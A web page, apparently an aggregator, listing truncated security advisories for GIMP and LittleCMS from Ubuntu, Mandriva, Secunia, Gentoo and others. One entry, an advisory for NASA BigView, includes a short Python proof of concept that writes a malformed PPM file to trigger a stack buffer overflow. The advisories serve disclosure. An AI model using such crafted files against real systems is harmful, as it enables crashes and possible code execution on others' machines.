New User, Welcome!     Login

Gimp 2.6.7

[USN-880-1] GIMP vulnerabilities

===========================================================
Ubuntu Security Notice USN-880-1           January 07, 2010
gimp vulnerabilities
CVE-2009-1570, CVE-2009-3909
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10

Secunia Research: Gimp PSD Image Parsing Integer Overflow Vulnerability

======================================================================

                     Secunia Research 17/11/2009

      - Gimp PSD Image Parsing Integer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1

Secunia Research: Gimp BMP Image Parsing Integer Overflow Vulnerability

====================================================================== 

                     Secunia Research 12/11/2009

      - Gimp BMP Image Parsing Integer Overflow Vulnerability -

====================================================================== 
Table of Contents

Affected Software....................................................1

[USN-494-1] Gimp vulnerability

=========================================================== 
Ubuntu Security Notice USN-494-1            August 02, 2007
gimp vulnerability
CVE-2006-4519
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10

[ MDVSA-2009:296-1 ] gimp

 Mandriva Linux Security Advisory                       MDVSA-2009:296-1
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : gimp
 Date    : December 11, 2009
 Affected: 2008.0
 _______________________________________________________________________

 Problem Description:

[ MDVSA-2009:332 ] gimp

 Mandriva Linux Security Advisory                         MDVSA-2009:332
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : gimp
 Date    : December 11, 2009
 Affected: 2009.1, 2010.0
 _______________________________________________________________________

 Problem Description:

[ MDVSA-2009:296 ] gimp

 Mandriva Linux Security Advisory                         MDVSA-2009:296
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : gimp
 Date    : November 13, 2009
 Affected: 2009.1, 2010.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

[ MDVSA-2009:332-1 ] gimp

 Mandriva Linux Security Advisory                       MDVSA-2009:332-1
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : gimp
 Date    : April 28, 2010
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

[ MDKSA-2007:170 ] - Updated gimp packages fix input data validation issues in several plugins

 
 Mandriva Linux Security Advisory                         MDKSA-2007:170
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : gimp
 Date    : August 23, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0
 _______________________________________________________________________
 
 Problem Description:

FLEA-2007-0038-1 gimp

Published: 2007-08-01

Rating: Minor

Updated Versions:
    gimp=/foresight.rpath.org@fl:1-devel//1/2.3.19-1-1
    group-dist=/foresight.rpath.org@fl:1-devel//1/1.3.2-0.6-5

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2949
    http://issues.foresightlinux.org/browse/FL-457

CORE-2008-0425 - NASA BigView Stack Buffer Overflow

Desktop i386

import struct
w = open("crash.ppm","wb")
w.write("""P3
#CREATOR: The GIMP's PNM Filter Version
1.0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""")
# This exploit is not trivial, because the function PPM::ppmHeader()
doesn't return inmmediately, and we must modify internal variables to
cause an overwrite of a C++ string destructor executed at the end of the
function to gain control of EIP

[ GLSA 200904-19 ] LittleCMS: Multiple vulnerabilities

Background
==========

LittleCMS, or short lcms, is a color management system for working with
ICC profiles. It is used by many applications including GIMP and
Firefox.

Affected packages
=================

[oCERT-2009-003] LittleCMS integer errors

errors as well as dangerous memory leaks. Decoding a specially crafted
image file will result in unexpected process termination, Denial Of
Service conditions or arbitrary code execution due to stack overflow.

LittleCMS is used by several Open Source projects including OpenJDK,
Firefox and GIMP.

Affected version:

LittleCMS <= 1.17


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!